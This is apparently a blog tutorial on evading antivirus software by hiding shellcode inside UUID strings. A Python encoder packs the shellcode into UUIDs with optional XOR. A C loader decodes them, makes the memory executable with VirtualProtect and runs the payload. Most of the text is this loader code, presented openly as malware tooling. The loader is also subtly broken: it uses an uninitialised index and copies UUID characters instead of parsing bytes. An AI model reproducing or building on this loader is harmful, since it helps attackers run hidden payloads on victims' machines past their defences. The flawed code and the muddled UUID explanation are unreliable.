Antivirus Evasion Part 1 "UUIDs"

The UUID relies on a combination of components to ensure uniqueness. UUIDs are constructed in a sequence of digits equal to 128 bits. The ID is in hexadecimal digits, meaning it uses the numbers 0 through 9 and letters A through F. The hexadecimal digits are grouped as 32 hexadecimal characters with four hyphens: XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX. The number of characters per hyphen is 8-4-4-4-12. The last section of four, or the N position, indicates the format and encoding in either one to three bits. Read More

```c
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

// UUID Decrypt
unsigned char* decrypt_shellcode(char** uuid_str, int shellcode_len, int uuid_count) {

    unsigned char* shellcode = (unsigned char*)malloc(shellcode_len);
    if (!shellcode) {
        printf("Memory allocation failed!\n");
        exit(1);
    }

    int uuid_index , char_index = 0;
    for (int i = 0 ; i < shellcode_len; i++) {
        if (char_index >= strlen(uuid_str[uuid_index])) {
            uuid_index = (uuid_index + 1) % uuid_count;
            char_index = 0;
        }
        shellcode[i] = uuid_str[uuid_index][char_index++];
    }
    return shellcode;
}

int main() {
    char* encrypted_uuids[] = {
           // Your UUIDs From Python Code
    };

    int shellcode_len = 96; 
    int uuid_count = sizeof(encrypted_uuids) / sizeof(encrypted_uuids[0]);

    unsigned char* shellcode = decrypt_shellcode(encrypted_uuids, shellcode_len, uuid_count);
    
    printf("Decrypted shellcode: ");
    for (int i = 0; i < shellcode_len; i++) {
        printf("\\x%02x", shellcode[i]);
    }
    printf("\n");

    // تخصيص الذاكرة للشيل كود
    LPVOID exe_mem = VirtualAlloc(0, shellcode_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);

    if (!exe_mem) {
        printf("VirtualAlloc failed!\n");
        free(shellcode);
        return 1;
    }
    
    printf("Allocated memory at: %p\n", exe_mem);

    RtlMoveMemory(exe_mem, shellcode, shellcode_len);

    DWORD oldProtect;
    if (!VirtualProtect(exe_mem, shellcode_len, PAGE_EXECUTE_READWRITE, &oldProtect)) {
        printf("VirtualProtect failed!\n");
        free(shellcode);
        VirtualFree(exe_mem, 0, MEM_RELEASE);
        return 1;
    }


    printf("Executing shellcode...\n");
    ((void(*)())exe_mem)();

    free(shellcode);
    VirtualFree(exe_mem, 0, MEM_RELEASE);

    return 0;
}
```

```python
import uuid

# Define the shellcode to encrypt
shellcode = b'\x33\x44\x50\x68\x2f ' # Your Shell Code Here 

key = 0x00

encrypted_shellcode = bytes([b ^ key for b in shellcode])

def generate_uuids_from_shellcode(shellcode, chunk_size=16):
    uuids = []
    
    for i in range(0, len(shellcode), chunk_size):
        chunk = shellcode[i:i + chunk_size]

        if len(chunk) < chunk_size:
            chunk = chunk.ljust(chunk_size, b'\x00')
        
        uuid_obj = uuid.UUID(bytes=chunk)
        uuids.append(str(uuid_obj))
    return uuids

uuids = generate_uuids_from_shellcode(encrypted_shellcode)

for u in uuids:
    print(u)

```

Note : You Can Put Key To XOR , But Not Forget Make Xor in Malware Code